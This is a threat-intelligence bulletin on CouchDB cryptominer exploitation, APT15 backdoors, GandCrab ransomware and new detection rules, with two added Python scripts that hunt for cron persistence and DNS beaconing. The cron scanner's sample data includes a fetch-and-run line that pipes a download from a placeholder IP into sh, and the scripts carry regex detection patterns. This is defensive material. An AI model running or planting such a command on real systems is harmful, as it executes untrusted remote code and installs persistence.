Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 2nd week of March 2018

New Detection Technique – Apache CouchDB RCE (CVE-2017-12636)

AlienVault has observed significant targeting of Apache CouchDB servers recently, exploiting two known vulnerabilities: CVE-2017-12635 and CVE-2017-12636. These attacks deliver Monero cryptocurrency miners. The vulnerabilities were patched back in November 2017, so keeping the software up to date should be sufficient to prevent these attacks from succeeding.

The vulnerabilities are used to gain administrator access to CouchDB. During the attack, a file (logo6.jpg) is downloaded and then executed as a shell script. The script kills any competing miners already running on the machine and downloads the actual cryptomining executable together with a configuration file. Finally, it configures cron jobs so the miner persists across system reboots.

CouchDB is a popular database management system, so attackers still have a wide range of possible targets.
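The post-exploitation behaviour described above (an image-named file run as a shell script, then cron entries added for persistence) leaves host-side traces a defender can hunt for. The following is an added example, not part of this bulletin and not AlienVault's signature or correlation logic. It scans crontab text and individual command lines for the two patterns the write-up describes. The crontab, command lines, IP address and paths are constructed sample data; only the file name logo6.jpg comes from the bulletin.

```python
"""Host-side hunt for the CouchDB post-exploitation traces described above.

Added example; not part of the bulletin or of any vendor tooling. It looks for
a file with an image extension (such as logo6.jpg) being executed by a shell
interpreter, and for cron entries that re-fetch or run such a file to survive
reboots. All sample input below is constructed; the address 203.0.113.7 and
the paths are hypothetical.
"""
import re

CRON_FIELDS = 5
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif|bmp)\b", re.IGNORECASE)
# A shell interpreter invoked as a command: sh, bash, dash, zsh, /bin/sh ...
SHELL_INTERP = re.compile(r"(?:^|[\s|;&/])(?:ba|da|z)?sh(?:\s|$)")
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")

# Constructed crontab: two benign entries followed by the persistence pattern.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update -qq
0 * * * * /bin/sh /opt/scripts/backup.sh
*/10 * * * * curl -fsSL http://203.0.113.7/logo6.jpg | sh
@reboot /bin/sh /tmp/logo6.jpg
"""


def parse_cron_line(line):
    """Return (schedule, command) or None for blank/comment lines.

    Handles both the five-field schedule and @reboot-style specials.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = stripped.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def suspicious_exec(cmdline):
    """True when a shell interpreter is asked to run an image-named file."""
    return bool(SHELL_INTERP.search(cmdline) and IMAGE_EXT.search(cmdline))


def cron_reasons(line):
    """List why a crontab line matches the persistence pattern (empty if clean)."""
    parsed = parse_cron_line(line)
    if parsed is None:
        return []
    _, cmd = parsed
    reasons = []
    if FETCH_TOOL.search(cmd) and SHELL_INTERP.search(cmd):
        reasons.append("download piped to shell")
    if suspicious_exec(cmd):
        reasons.append("image-named file run as script")
    return reasons


def scan_crontab(text):
    """Return [(line, reasons)] for every line that raised at least one reason."""
    hits = []
    for line in text.splitlines():
        reasons = cron_reasons(line)
        if reasons:
            hits.append((line.strip(), reasons))
    return hits


if __name__ == "__main__":
    for entry, why in scan_crontab(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS cron entry: {entry}  -> {', '.join(why)}")
    # The same check applies to shell history or process command lines.
    print(suspicious_exec("sh /tmp/logo6.jpg"))
```

The regexes are deliberately narrow (a shell interpreter token plus an image extension, or a download tool plus a shell) so the scan stays quiet on ordinary maintenance jobs such as the backup entry in the sample; broaden them to taste once the baseline of a given host is known.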

We've added IDS signatures and the following correlation rule to detect this activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache CouchDB JSON Remote Privesc Attempt (CVE-2017-12636)

New Detection Technique – APT15 BS2005 RoyalAPT/DNS/CLI

APT15 is a targeted-attack group that has been active for a number of years. Recent reporting has identified new backdoors such as RoyalAPT, RoyalDNS and RoyalCLI. Using this malware, the group recently penetrated a government contractor and stole information about military technology.

RoyalCLI and RoyalAPT appear to be an evolution of APT15's earlier BS2005 malware, and they share some C&C domain names with it. Evidence of compromise was found on the disks of the affected machines, where the C&C activity left traces behind. During the attack, the group also used Mimikatz to dump Windows credentials and generate Kerberos golden tickets to ensure persistence, which left traces of its own.

APT15 also deployed a DNS-based backdoor called RoyalDNS. It maintains persistence through a service called 'Nwsapagent', and its C&C traffic is carried in DNS TXT records.

After compromising the initial machines, lateral movement was conducted inside the LAN using a combination of built-in network commands and Windows remote-execution tools.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromised, Trojan infection, APT15 BS2005 RoyalAPT/DNS/CLI

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromised, Trojan infection, Arkei Stealer
  • System Compromised, Trojan infection, Grobios
  • System Compromised, Trojan infection, MSIL/Safen
  • System Compromised, Trojan infection, Win32/Configer
  • System Compromised, Trojan infection, Win32/QQWare.AA

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Type Confusion (CVE-2017-4920)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Adobe Flash Use After Free (CVE-2017-4919)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Exim 4.90.1 Base64 Overflow RCE (CVE-2018-6789)
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, GreenFlash SunDown EK Payload March 9 2018
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MikroTik RouterOS Chimay Red RCE
  • System Compromise, C&C Communication, [PTsecurity] Fake SSL Certificate
  • System Compromise, C&C Communication, Zyklon HTTP Malicious SSL Certificate
  • System Compromise, Malicious Download, Suspicious infection.exe Download
  • System Compromise, Malware RAT, JanHof RAT
  • System Compromise, Malware RAT, QwertyRAT
  • System Compromise, Ransomware infection, MSIL/GhostFlower
  • System Compromise, Ransomware infection, Win32/CrystalCrypt

Updated Detection Technique – GandCrab

GandCrab ransomware appeared in the wild in January 2018. Since then, it has been distributed in several campaigns, including fake Chrome HoeflerText popup windows, spam emails, and the RIG exploit kit. The attack chain starts with a PDF that links to a Word document download; the document launches a PowerShell script that then downloads and executes a DLL file.

Campaigns evolved between January and March. Earlier infections deployed the Dridex banking trojan instead of the GandCrab ransomware. GandCrab first appeared as a Windows executable with a .exe extension.

One of the most identifiable characteristics of GandCrab is that it demands the ransom payment in Dash cryptocurrency instead of Bitcoin. It also uses Namecoin .bit top-level domains for command and control activity.
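Two of the DNS behaviours this update describes, the RoyalDNS backdoor's C&C over TXT records (APT15 section above) and GandCrab's use of .bit domains, can both be surfaced from ordinary resolver query logs. The following is an added example, not part of this bulletin and not AlienVault's IDS or correlation logic. It parses a constructed query log in a hypothetical four-column format (timestamp, client, query name, query type), flags any lookup under the .bit TLD (which public resolvers cannot serve, so such a query is a signal on its own), and flags clients that issue many TXT queries whose leftmost label looks like encoded data. The hostnames, addresses and thresholds are assumptions.

```python
"""Detection heuristics for the DNS behaviour described in this bulletin.

Added example; not AlienVault's signature or correlation logic. Two signals:
(1) hosts issuing many TXT queries whose leftmost label looks like encoded
data, matching a TXT-record C&C channel such as RoyalDNS, and (2) any query
for a name under the Namecoin .bit TLD, which GandCrab uses for C&C. The log
format and every record below are constructed sample data; the names and
addresses are hypothetical.
"""
from collections import defaultdict
from statistics import mean

# Constructed log: one normal client, one TXT beaconing client, one .bit lookup.
SAMPLE_DNS_LOG = """\
2018-03-12T10:00:01 10.0.0.5 www.example.com A
2018-03-12T10:00:02 10.0.0.5 _dmarc.example.com TXT
2018-03-12T10:00:05 10.0.0.9 a3f9c1e7b2d4f0e1.cdn-update.example.net TXT
2018-03-12T10:00:35 10.0.0.9 5c0d9e8f7a6b1c2d.cdn-update.example.net TXT
2018-03-12T10:01:05 10.0.0.9 9b8a7c6d5e4f3a2b.cdn-update.example.net TXT
2018-03-12T10:01:35 10.0.0.9 1f2e3d4c5b6a7988.cdn-update.example.net TXT
2018-03-12T10:02:05 10.0.0.9 0a1b2c3d4e5f6a7b.cdn-update.example.net TXT
2018-03-12T10:02:35 10.0.0.9 c4d5e6f708192a3b.cdn-update.example.net TXT
2018-03-12T10:03:00 10.0.0.12 example-c2.bit A
"""


def parse_dns_log(text):
    """Parse whitespace-separated records into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        records.append({
            "ts": ts,
            "client": client,
            "qname": qname.rstrip(".").lower(),
            "qtype": qtype.upper(),
        })
    return records


def find_bit_tld_queries(records):
    """Return (client, qname) for every query under the .bit TLD."""
    return [(r["client"], r["qname"]) for r in records
            if r["qname"] == "bit" or r["qname"].endswith(".bit")]


def find_txt_beacons(records, min_queries=5, min_mean_label_len=12):
    """Flag clients whose TXT queries look like an encoded command channel.

    A client is reported when it issued at least `min_queries` TXT queries and
    the mean length of the leftmost label is at least `min_mean_label_len`.
    Both thresholds are assumptions to tune per environment.
    """
    per_client = defaultdict(list)
    for r in records:
        if r["qtype"] == "TXT":
            per_client[r["client"]].append(r["qname"].split(".")[0])
    flagged = {}
    for client, labels in per_client.items():
        avg = mean(len(lab) for lab in labels)
        if len(labels) >= min_queries and avg >= min_mean_label_len:
            flagged[client] = {
                "count": len(labels),
                "mean_label_len": avg,
                "distinct_labels": len(set(labels)),
            }
    return flagged


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    for client, qname in find_bit_tld_queries(recs):
        print(f"[.bit TLD] {client} queried {qname}")
    for client, info in find_txt_beacons(recs).items():
        print(f"[TXT beacon] {client}: {info}")
```

The legitimate `_dmarc` TXT lookup from 10.0.0.5 is not flagged because a single short-label query never reaches either threshold; in production the count threshold should be applied per time window and the label-length check can be supplemented with an entropy measure.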

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Ransomware infection, GandCrab

Updated Detection Technique – Malware SSL Certificates

We've added new IDS signatures covering the list of certificates that Abuse.ch has identified as associated with malware or botnet activity. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

  • System Compromise, C&C Communication, Bancos Variant Downloader SSL Certificate
  • System Compromise, C&C Communication, Known malicious SSL certificate
  • System Compromise, C&C Communication, StrongPity SSL activity
  • System Compromise, C&C Communication, Zeus Panda SSL Certificate

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware RAT, QRat
  • System Compromise, Malware RAT, Remcos/Remvio
  • System Compromise, Mobile trojan infection, Android/Arukas.A!tr
  • System Compromise, Mobile trojan infection, Asacub.a Banker
  • System Compromise, Targeted Malware, StrongPity
  • System Compromise, Trojan infection, Bitcoin Miner
  • System Compromise, Trojan infection, Bancos Variant.DZO